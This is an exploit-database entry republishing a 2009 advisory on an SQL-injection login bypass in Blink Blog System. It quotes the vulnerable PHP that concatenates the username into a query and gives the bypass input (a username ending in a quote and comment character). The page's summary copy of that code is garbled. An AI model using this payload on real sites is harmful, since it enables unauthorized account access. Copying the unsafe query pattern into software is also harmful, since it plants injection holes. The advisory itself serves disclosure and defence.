header-logo
Suggest Exploit
vendor:
Blink Blog System
by:
Salvatore Fresta aka drosophila
6,4
CVSS
MEDIUM
Authentication Bypass
89
CWE
Product Name: Blink Blog System
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Authentication Bypass in Blink Blog System

There are many SQL Injection flaws but I post the only one that allows a guest to bypass the login. This bug allows a guest to bypass the login. login.php: $username = $_POST["nick"]; $password = md5($_POST["password"]); if ($data = $DB->usercheck($username, $password)) db.php: function usercheck($username, $password) { $try = mysql_query("SELECT * FROM users WHERE nick="'.$username."""" AND password=""'.$password."""" "");"

Mitigation:

No fix.
Source

Exploit-DB raw data:

********   Salvatore "drosophila" Fresta   ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs

There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

	...
	
	$username = $_POST["nick"];
    $password = md5($_POST["password"]);
    if ($data = $DB->usercheck($username, $password))
    
    ...
    
db.php:

	function usercheck($username, $password)
    {
        $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");
        
    ...


***************************************************

[+] Code


- [A] Authentication Bypass

username: root"#
password: foo


***************************************************

[+] Fix

No fix.


***************************************************

# milw0rm.com [2009-08-03]

Navigation

Suggest Exploit

Services By CQR